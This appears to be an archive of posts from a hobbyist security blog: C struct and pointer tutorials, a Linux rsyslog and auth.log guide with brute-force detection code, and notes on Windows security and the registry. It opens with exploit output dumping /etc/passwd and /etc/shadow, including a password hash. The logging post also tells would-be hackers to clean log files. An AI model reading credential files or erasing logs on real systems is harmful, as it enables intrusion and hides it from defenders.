avahi-autoipd:x:103:106:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
usbmux:x:104:46:usbmux daemon,,,:/home/usbmux:/bin/false
whoopsie:x:105:110::/nonexistent:/bin/false
kernoops:x:106:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
rtkit:x:107:114:RealtimeKit,,,:/proc:/bin/false
colord:x:109:117:colord colour management daemon,,,:/var/lib/colord:/bin/false
lightdm:x:110:118:Light Display Manager:/var/lib/lightdm:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
hplip:x:112:7:HPLIP system user,,,:/var/run/hplip:/bin/false
pulse:x:113:121:PulseAudio daemon,,,:/var/run/pulse:/bin/false
saned:x:114:123::/home/saned:/bin/false
kdm:x:115:65534::/home/kdm:/bin/false
test:x:1000:1000:test,,,:/home/test:/bin/bash
# cat /etc/shadow
root:!:15651:0:99999:7:::
daemon:*:15630:0:99999:7:::
bin:*:15630:0:99999:7:::
sys:*:15630:0:99999:7:::
sync:*:15630:0:99999:7:::
games:*:15630:0:99999:7:::
man:*:15630:0:99999:7:::
lp:*:15630:0:99999:7:::
mail:*:15630:0:99999:7:::
news:*:15630:0:99999:7:::
uucp:*:15630:0:99999:7:::
proxy:*:15630:0:99999:7:::
www-data:*:15630:0:99999:7:::
backup:*:15630:0:99999:7:::
list:*:15630:0:99999:7:::
irc:*:15630:0:99999:7:::
gnats:*:15630:0:99999:7:::
nobody:*:15630:0:99999:7:::
libuuid:!:15630:0:99999:7:::
syslog:*:15630:0:99999:7:::
messagebus:*:15630:0:99999:7:::
avahi-autoipd:*:15630:0:99999:7:::
usbmux:*:15630:0:99999:7:::
whoopsie:*:15630:0:99999:7:::
kernoops:*:15630:0:99999:7:::
rtkit:*:15630:0:99999:7:::
colord:*:15630:0:99999:7:::
lightdm:*:15630:0:99999:7:::
avahi:*:15630:0:99999:7:::
hplip:*:15630:0:99999:7:::
pulse:*:15630:0:99999:7:::
saned:*:15630:0:99999:7:::
kdm:*:15650:0:99999:7:::
test:$6$aoMcNoTU$IR6Ug3SthKdI4.ixdwf9rsIRsdz.4OACiabhaoxdd0NoYbjvxa9I.dj7VF7U4OaB7Oy2gDezCXL/oQx9riRXP0:15651:0:99999:7:::


This is really great!

Source: http://www.exploit-db.com/exploits/24746/

struct,typedef,array and pointer [all togther?]

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

This post is a follow-up to http://www.pusheax.com/2013/03/struct-and-typedef-of-c-programming.html, the struct, pointer and typedef examples. Here I have done some more advanced things with structs:

#include <stdio.h>
#include <string.h>

int main()
{
    //Yes, we can store a whole sentence in a variable (remember the *):
    const char *str="We need to know programming for being a security researcher.";

    int *ptr; //We are declaring a C pointer, which starts with an asterisk!
    int anotherN; //This is an int variable
    anotherN=1337; //The current value of the declared variable.
    int what; //A blank variable has been declared.

    ptr=&anotherN; //This is the pointer trick. ptr is now pointing to the address of anotherN
    what=*ptr; /*Now ptr holds the address of anotherN, and the int at that address is 1337. So what=1337.
                 Whenever we are going to read or change the value of a variable through a pointer,
                 remember that we need the asterisk. First we need "&" to take the address,
                 then we need the asterisk to get at the value stored there. */

    *ptr=420; /* Remember that anotherN's value was 1337? Now it is 420. So we really
                 can change the value by assigning through the pointer. Remember that it only
                 changes the value at the referenced address, in our case "anotherN". */

    printf("\n\n\n%s\n",str); //Print the value of "str"
    printf("Value of what: %d\n",what);
    printf("Value of anotherN: %d\n",anotherN);

    //Time to go advanced!

    typedef struct pusheax
    {
        int push;
        char add[20]; //It is not a problem to use an array.
    }pUsheax; //The alias name

    pUsheax instanc; //An instance of the struct.
    pUsheax *mypusheax; //Declaring a "pusheax" type pointer. Yes, we can have a pointer to a struct.

    mypusheax=&instanc; //Pointing to instanc
    instanc.push=100; //push=100

    //Print the value of "push":
    printf("The current value of \"push\" is: %d\n",instanc.push);

    mypusheax->push=200; /* Tricky? Now we are not changing the value using the asterisk.
                            Here we use the "->" operator (dash and "greater than") to reach the
                            member through the pointer: mypusheax points at instanc, so
                            mypusheax->push is instanc.push. It is the same as (*mypusheax).push. */

    printf("Now \"push\"= %d\n\n\n",instanc.push);

    strcpy(mypusheax->add,"www.pusheax.com"); /*store the string www.pusheax.com in the "add" array.
                            strcpy is evil. It causes a buffer overflow if more than 20 bytes
                            (including the terminating NUL) are copied into "add": the stack gets
                            overwritten, because strcpy does not check boundaries. A safer choice
                            is strncpy() with sizeof(add), remembering that strncpy does not
                            NUL-terminate when the source is too long. */

    printf("\t\t\t\t\t%s\n",instanc.add); //We print the current value of the add[20] array.
    printf("\t\t\t\t\t---------------\n");
    printf("\t\t\t\t\t%s\n\n\n",mypusheax->add); /* We can also get the value of add[] through the
                                                   pointer instead of calling instanc.add */

    return 0;
}

Compile and Run:

push@pusheax:~/code$ gcc strucptr.c -o strucptr
push@pusheax:~/code$ ./strucptr



We need to know programming for being a security researcher.
Value of what: 1337
Value of anotherN: 420
The current value of "push" is: 100
Now "push"= 200


www.pusheax.com
---------------
www.pusheax.com


push@pusheax:~/code$

struct and typedef of C programming lanugage

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

C is a really powerful system programming language. I believe most experienced hackers, penetration testers and exploit developers have knowledge of C (at least the basics). I am not a professional or regularly experienced programmer; I code when I feel the shortage :). Coding is really fun if we can compile without any error... no? I kept forgetting the C structure syntax, struct and typedef. So I quickly wrote this blog post with the complete code in case it is useful to someone :). Just see the C comments for the explanation of each line.

#include <stdio.h>

int main()
{
    struct pusheax /* A struct is a collection of variables. Declaring the name of the struct
                      works like defining a TYPE; the name is also called the tag. So here
                      the tag is "pusheax". We can call it the "name of the struct". */
    {
        int number; //Member variable.
        int number1; //Declaring another member.
    };

    struct pusheax hacker; /* Here "hacker" is an instance of the "pusheax" tag.
                              We need it to access the members. */

    hacker.number=1337; /* now the value of the member can be set like
                           "hacker.number". <instance.member=value> */
    hacker.number1=31337;

    //Same as a normal printf call. But here we must add the struct instance and a dot, otherwise it won't work:
    printf("hacker.number is : %d\n",hacker.number);
    printf("hacker.number1 is: %d\n",hacker.number1); //Same as previous.

    struct ini //Another struct.
    {
        const char *str; //It is going to be a string pointer, because the value won't be only "H" :).
        int number; //Another member.
    };

    struct ini string={0,0}; // We can also initialize the members!

    string.str="Hackers"; //The value of the member declared above under the struct "ini"
    string.number=1337; //Another C variable

    printf("Char is = %s & number is = %d\n",string.str,string.number); /* Notice that we can declare
                                  a member with the same name in another struct without any conflict */

    //Let's use the typedef keyword too.

    typedef struct puSheax // New? It is a structure definition. puSheax is the name [tag].
    //We can use it the same as the structure above
    {
        const char *know; //C char pointer
        int knowing; // Another C integer variable
    }p00seax; // The alias name. This is what we are using typedef for.

    p00seax p0sheax; //How fun? Now we declared another variable using the alias. A mask?
    p0sheax.know="Knowledge is power!"; /* again we need to set the value. So it is completely related
                                           to the puSheax struct */
    p0sheax.knowing=301337; // Same as above

    printf("Value of \"know\": \"%s\" and value of \"knowing\" is : \"%d\"\n",
           p0sheax.know,p0sheax.knowing); // Perhaps nothing to explain here.

    printf("\n\n\n\t\tpusheax.com is for independent ethical hacking,"
           "penetration testing,programming practice!!! :)\n\n\n\t");
    puts(" Next: http://www.pusheax.com/2013/03/structtypedefarray-and-pointer-all.html\n");
    return 0; //No error, just exit normally!

    //compile: gcc struc.c -o struc
    //run: ./struc
}

push@pusheax:~/code$ gcc struc.c -o struc;./struc
hacker.number is : 1337
hacker.number1 is: 31337
Char is = Hackers & number is = 1337
Value of "know": "Knowledge is power!" and value of "knowing" is : "301337"



pusheax.com is for independent ethical hacking,penetration testing,programming practice!!!:)
Next: http://www.pusheax.com/2013/03/structtypedefarray-and-pointer-all.html 

Simple?

If you have any questions please let’s discuss :).

Linux LOG files!

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

Today I was setting up iptables and sending its log lines to a separate file so that I can find all the alerts and info easily. Writing a quick blog post came to mind, in case any newbie wants a basic idea of Linux logs (trying to catch a hacker? Not easy, hehe). I am doing it on my Debian system (I will edit later when I do the same thing on another distro).
System logs store security, auditing, debugging and other information in specific files. They can be used for various security tasks: logging fake/real hackers, tracking system issues, etc. Where the log files are saved and what type of log is generated is specified in /etc/rsyslog.conf (Debian/Ubuntu). Here is my current configuration file:

#  /etc/rsyslog.conf    Configuration file for rsyslog.
#
# For more information see
# /usr/share/doc/rsyslog-doc/html/rsyslog_conf.html


#################
#### MODULES ####
#################

$ModLoad imuxsock # provides support for local system logging
$ModLoad imklog # provides kernel logging support
#$ModLoad immark # provides --MARK-- message capability

# provides UDP syslog reception
#$ModLoad imudp
#$UDPServerRun 514

# provides TCP syslog reception
#$ModLoad imtcp
#$InputTCPServerRun 514


###########################
#### GLOBAL DIRECTIVES ####
###########################

#
# Use traditional timestamp format.
# To enable high precision timestamps, comment out the following line.
#
$ActionFileDefaultTemplate RSYSLOG_TraditionalFileFormat

#
# Set the default permissions for all log files.
#
$FileOwner root
$FileGroup adm
$FileCreateMode 0640
$DirCreateMode 0755
$Umask 0022

#
# Where to place spool and state files
#
$WorkDirectory /var/spool/rsyslog

#
# Include all config files in /etc/rsyslog.d/
#
$IncludeConfig /etc/rsyslog.d/*.conf


###############
#### RULES ####
###############

#
# First some standard log files. Log by facility.
#
auth,authpriv.* /var/log/auth.log
*.*;auth,authpriv.none -/var/log/syslog
#cron.* /var/log/cron.log
daemon.* -/var/log/daemon.log
kern.* -/var/log/kern.log
lpr.* -/var/log/lpr.log
mail.* -/var/log/mail.log
user.* -/var/log/user.log
kern.warning /var/log/iptables.log

#
# Logging for the mail system. Split it up so that
# it is easy to write scripts to parse these files.
#
mail.info -/var/log/mail.info
mail.warn -/var/log/mail.warn
mail.err /var/log/mail.err

#
# Logging for INN news system.
#
news.crit /var/log/news/news.crit
news.err /var/log/news/news.err
news.notice -/var/log/news/news.notice

## (rest of the file stripped)

Everything about the logs is configured in this file. Linux/Unix usually stores logs in /var/log/ unless that is customized. In /var/log we can find all the log files (my listing: http://pastebin.com/d0LfNFfg).

Let me explain a few of them:

apt        == Package installation and removal logs.
auth.log   == Authentication and authorization related logs.
debug      == Debugging logs.
dmesg      == Dump of the kernel message buffer.
exim4      == exim4 mail server logs.
faillog    == Failed login attempts.
kern.log   == Kernel level log.
lastlog    == Last login information.
messages   == Main log file.
mail.*     == Mail related info, alerts, warnings.
mysql      == MySQL log.
pure-ftpd  == FTP logs.
syslog     == Main log file.
wtmp       == Login records.

Well, to customize the logs we need to know two things, which every rule in rsyslog.conf indicates:

1. Facility (what produced the message?) 2. Level (info, warning, alert etc.)

Facilities are:

auth     == Security & authorization.
authpriv == Private authorization messages.
cron     == Cron daemon.
user     == User processes.
mail     == Mail related messages.
ftp      == FTP related.
kern     == Kernel related messages.
lpr      == Printer logs.
etc.

Levels are (from most to least severe; which one you pick depends on how much you want to know):

emerg   == System is unusable.
alert   == Urgent, act immediately.
crit    == Critical messages.
err     == Error messages.
warning == Warning messages.
notice  == Normal but worth verifying!
info    == Informational messages.
debug   == Debugging purposes.

From the configuration file it is understandable how the facility and level should be indicated. For example:

mail.info            -/var/log/mail.info

Here "mail" is the facility, "info" is the level and

/var/log/mail.info is telling where to save.

Two things to keep in mind: a selector matches the given level and every more severe one, so mail.info receives info, notice, warning, err, crit, alert and emerg messages from the mail facility (only debug is left out); and the "-" in front of the path tells rsyslog it may buffer writes to that file instead of syncing after every message, which is faster but can lose the last lines in a crash.
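The selector semantics described above, as an added example that is not part of the post and not rsyslog's code: selector_matches() implements the classic facility.level syntax used in the configuration listed earlier (level-and-above matching, "*" wildcards, comma-separated facility lists and ".none" exclusions joined by ";"); rsyslog's "=level", "!level" and RainerScript forms are assumed out of scope. RULES copies the relevant lines of that configuration so destinations() can show which files one message ends up in.

```python
"""rsyslog selector semantics, as an added example (not from the post, not rsyslog code).

Classic facility.level selectors only: a level matches itself and everything more
severe, "*" matches any facility or level, "none" takes a facility back out, and
";" joins selectors with later ones overriding earlier ones for the facilities
they name. "=level", "!level" and RainerScript are deliberately not handled.
"""

LEVELS = ["emerg", "alert", "crit", "err", "warning", "notice", "info", "debug"]
ALIASES = {"panic": "emerg", "error": "err", "warn": "warning"}


def level_index(level):
    """Numeric severity: 0 = emerg ... 7 = debug (lower is more severe)."""
    return LEVELS.index(ALIASES.get(level, level))


def selector_matches(selector, facility, level):
    """True when a message with this facility and level is selected by the selector."""
    selected = False
    for part in selector.split(";"):
        facilities, _, lvl = part.partition(".")
        facs = facilities.split(",")
        if "*" not in facs and facility not in facs:
            continue                      # this part says nothing about our facility
        if lvl == "none":
            selected = False              # exclusion, e.g. auth,authpriv.none
        elif lvl == "*":
            selected = True
        else:
            selected = level_index(level) <= level_index(lvl)   # this level or more severe
    return selected


def destinations(rules, facility, level):
    """Every file a message is written to under (selector, target) rules, with the
    '-' (asynchronous write) prefix stripped from the path."""
    return [target.lstrip("-")
            for selector, target in rules
            if selector_matches(selector, facility, level)]


RULES = [                                 # the relevant lines of the rsyslog.conf above
    ("auth,authpriv.*", "/var/log/auth.log"),
    ("*.*;auth,authpriv.none", "-/var/log/syslog"),
    ("kern.*", "-/var/log/kern.log"),
    ("kern.warning", "/var/log/iptables.log"),
    ("mail.info", "-/var/log/mail.info"),
    ("mail.err", "/var/log/mail.err"),
]

if __name__ == "__main__":
    for fac, lvl in [("kern", "warning"), ("kern", "notice"), ("auth", "info"), ("mail", "err")]:
        print("%s.%s -> %s" % (fac, lvl, destinations(RULES, fac, lvl)))
```

Running it shows the consequence of the kern.warning rule: a kernel warning (which is what an iptables LOG line is) lands in syslog, kern.log and iptables.log at once, while a kern.notice message never reaches iptables.log.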

Now I am going to show some examples.

Let's see how the SSH logs look. SSH logs are usually saved in /var/log/auth.log:

root@logtest:/var/log# cat auth.log

root@logtest:/var/log#

Blank!

So first I try a failed login attempt:

science@BAD-LUCK:~$ ssh root@192.168.78.130

root@192.168.78.130's password:

Permission denied, please try again.

root@192.168.78.130's password:

Now let’s see what is in auth.log:

root@logtest:/var/log# cat auth.log

Feb 27 10:59:44 scientific sshd[4285]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=hacker.local user=root
Feb 27 10:59:46 scientific sshd[4285]: Failed password for root from 192.168.78.1 port 60904 ssh2
Feb 27 11:00:01 scientific CRON[4287]: pam_unix(cron:session): session opened for user root by (uid=0)
Feb 27 11:00:17 scientific CRON[4287]: pam_unix(cron:session): session closed for user root

It clearly says that the host "hacker.local" (rhost) tried to log in as user root over ssh (tty=ssh); the next line says the failed password attempt came from 192.168.78.1, port 60904.

I again attempted to log in, this time to the FTP server (ftp 192.168.78.1). The authentication failure is saved in auth.log as well:

Feb 27 11:23:08 scientific pure-ftpd: pam_unix(pure-ftpd:auth): check pass; user unknown
Feb 27 11:23:08 scientific pure-ftpd: pam_unix(pure-ftpd:auth): authentication failure; logname= uid=0 euid=0 tty=pure-ftpd ruser=aaaaaaaaaaaaa rhost=hacker.local

The logs can be saved elsewhere too if we say so in rsyslog.conf. For example, I made my own log file for iptables:

# iptables LOG rules are written by the kernel, so the lines arrive under the kern facility
kern.warning  /var/log/iptables.log

Note that kern.warning matches warning and every more severe level, and the kern.* and *.* rules above it still fire, so each iptables LOG line ends up in iptables.log, kern.log and syslog.

If someone brute forces any service such as ssh, ftp etc., every failed attempt will be saved to auth.log (be careful if you are trying to hack! always clean the log files).
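Turning that observation into a check, as an added example that is not part of the post: the functions below parse sshd "Failed password" records in the format the auth.log excerpt above shows, count them per source address and flag addresses over a threshold. The log lines are constructed for the example, modelled on the ones in the post (the "invalid user" form is sshd's own wording when the account does not exist); they are not real captures.

```python
"""Failed-login triage over auth.log lines, as an added example (not from the post).

Counts sshd "Failed password" records per source address and flags addresses above
a threshold. The pam_unix "authentication failure" line that sshd logs for the same
attempt is deliberately not counted, so one failed password is one failure, not two.
SAMPLE_LOG is constructed for the example, modelled on the post's excerpt.
"""
import re
from collections import defaultdict

FAILED_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) sshd\[\d+\]: "
    r"Failed password for (?P<invalid>invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port (?P<port>\d+) ssh2$"
)

SAMPLE_LOG = """\
Feb 27 10:59:44 scientific sshd[4285]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=hacker.local user=root
Feb 27 10:59:46 scientific sshd[4285]: Failed password for root from 192.168.78.1 port 60904 ssh2
Feb 27 10:59:51 scientific sshd[4285]: Failed password for root from 192.168.78.1 port 60904 ssh2
Feb 27 10:59:55 scientific sshd[4285]: Failed password for root from 192.168.78.1 port 60904 ssh2
Feb 27 11:00:01 scientific CRON[4287]: pam_unix(cron:session): session opened for user root by (uid=0)
Feb 27 11:00:09 scientific sshd[4290]: Failed password for invalid user admin from 192.168.78.1 port 60910 ssh2
Feb 27 11:02:30 scientific sshd[4301]: Failed password for test from 192.168.78.20 port 41022 ssh2
Feb 27 11:02:41 scientific sshd[4301]: Accepted password for test from 192.168.78.20 port 41022 ssh2
"""


def failed_logins(lines):
    """{source ip: [(user, unknown_account), ...]} for every sshd 'Failed password' line."""
    by_ip = defaultdict(list)
    for line in lines:
        m = FAILED_RE.match(line.rstrip("\n"))
        if m:
            by_ip[m.group("ip")].append((m.group("user"), m.group("invalid") is not None))
    return dict(by_ip)


def flag_bruteforce(lines, threshold=3):
    """Addresses with at least `threshold` failed passwords, most failures first."""
    counts = {ip: len(v) for ip, v in failed_logins(lines).items()}
    return sorted((ip for ip, n in counts.items() if n >= threshold),
                  key=lambda ip: -counts[ip])


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()          # for a live system: open("/var/log/auth.log")
    for ip, attempts in failed_logins(lines).items():
        unknown = sum(1 for _, inv in attempts if inv)
        print("%s: %d failed, %d against unknown accounts" % (ip, len(attempts), unknown))
    print("brute force candidates:", flag_bruteforce(lines))
```

Guesses against accounts that do not exist are kept apart from guesses against real ones, because a run of "invalid user" failures from one address is a wordlist scan, while repeated failures against a single real account are the case worth a closer look (and a password change).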

More:
http://en.wikipedia.org/wiki/Syslog
http://www.rsyslog.com/doc/manual.html

Windows Security Components !

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

There are some components that make up Windows security. I have often searched Google for how Windows security is actually implemented. From my understanding I want to describe the basics here so that any interested person can get a quick idea. See below:

SAM database: the SAM is a database where user information is stored. It stores all local users' information (domain users live in Active Directory). The SAM can be found in the registry under HKEY_LOCAL_MACHINE\SAM and on disk at C:\WINDOWS\system32\config\SAM.

LSASS: the Local Security Authority Subsystem (LSASS) is responsible for enforcing the security policy of the Windows system. It also writes security warnings to the event logs. LSASS is responsible for user logons, password changes, access token generation etc. If we open Task Manager we see a running process called lsass.exe under the SYSTEM user. If that process is killed, Windows forces a restart.

http://en.wikipedia.org/wiki/Local_Security_Authority_Subsystem_Service
http://www.neuber.com/taskmanager/process/lsass.exe.html

WinLogon: http://technet.microsoft.com/en-us/library/cc780095%28v=ws.10%29.aspx

NetLogon: http://www.windowsitpro.com/article/domains2/the-netlogon-service-516

AppLocker: specifies which applications, scripts and installers a given user or group is allowed to run (application whitelisting, i.e. access control over what gets executed rather than over which files can be read).

Active Directory: stores information about the users, groups and computers of a domain.

Security reference monitor (SRM): http://www.cs.gmu.edu/~menasce/osbook/nt/tsld034.html

Quickly written for search purposes :)....

WINDOWS REGISTERY

The site moved to root domain where all post are imported. Please go to http://pusheax.com/


The Windows Registry is a database that stores all kinds of Windows system configuration: kernel, device and user configuration, etc.
As a penetration tester or an advanced system administrator we need a clear understanding of the Windows Registry, because often we need to configure the system manually. That is why I am going to explain the basics of the Windows Registry, which I learned from various resources, experience and self-study.
How the registry fits into the Windows boot:
  • The boot configuration is stored in the registry. When Windows boots it first reads the configuration from the registry hives and loads it into memory. Then it is the kernel's turn!
  • When the kernel starts initializing, it first reads other configuration such as the device configuration.
  • Then the remaining configuration is read: user configuration, wallpaper, screen saver etc.
A lot of information is stored in the registry. Keeping it all as one untyped blob would be horrible, so every value has a type; here are a few of them:
REG_NONE == no value type
REG_SZ == null-terminated string
REG_BINARY == binary data
REG_DWORD == 32-bit number (double word), little-endian
REG_DWORD_BIG_ENDIAN == 32-bit number, big-endian
REG_LINK == symbolic link
REG_FULL_RESOURCE_DESCRIPTOR == hardware resource description
REG_QWORD == 64-bit number
And the root keys:
  • HKEY_CLASSES_ROOT
  • HKEY_CURRENT_USER
  • HKEY_LOCAL_MACHINE
  • HKEY_USERS
  • HKEY_CURRENT_CONFIG
Let's explain these root keys below.
HKEY_CLASSES_ROOT: abbreviated HKCR, HKEY_CLASSES_ROOT contains information about registered applications, such as file associations and OLE object class IDs, tying them to the applications used to handle these items.
HKEY_CURRENT_USER:
Here all the configuration of the currently logged-in user is stored.
There are 12 subkeys under HKEY_CURRENT_USER:
AppEvents == Sound/event settings
Console == Console window settings such as screen colour, width, font size etc.
Control Panel == Wallpaper, screensaver, mouse etc.
Environment == Environment variable definitions
EUDC == End-user-defined characters
Identities == Outlook Express / Windows Mail identities
Keyboard Layout == Keyboard layout (e.g. U.S.)
Network == Mapped network drive settings
Printers == Printer connection settings
Software == User-specific software settings
System == User-specific system settings
Volatile Environment == Environment variables that exist only for the current logon session (rebuilt at every logon)
HKEY_LOCAL_MACHINE:
In this root key all the machine-wide configuration is stored: HARDWARE, SAM, SECURITY, SOFTWARE, SYSTEM (computer name, services, drivers) etc.
Malware, backdoors, keyloggers and other malicious software also target this key (for example the Run keys under Software\Microsoft\Windows\CurrentVersion, which start programs at logon).
HKEY_USERS:
HKEY_USERS contains subkeys corresponding to the HKEY_CURRENT_USER keys for each user profile actively loaded on the machine, though user hives are usually only loaded for currently logged-in users.
If logged in as “weird science” then I can see there is a subkey for that user, named after the user's SID.
HKEY_CURRENT_CONFIG:
Perhaps no need to explain it; it is a link to the current hardware profile under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Hardware Profiles\Current. If you still want to know more about it then please search on Google. :)
Hives:
Microsoft (copied and pasted): A hive is a logical group of keys, subkeys, and values in the registry that has a set of supporting files containing backups of its data.

Each time a new user logs on to a computer, a new hive is created for that user with a separate file for the user profile. This is called the user profile hive. A user’s hive contains specific registry information pertaining to the user’s application settings, desktop, environment, network connections, and printers. User profile hives are located under the HKEY_USERS key. More: http://msdn.microsoft.com/en-us/library/windows/desktop/ms724877%28v=vs.85%29.aspx

Next I will explain some security tasks in the Windows registry when I have some security related work in the registry; I hope it will be soon :). Stay tuned!
Feel free to post any questions related to the Windows registry! :)
Reference: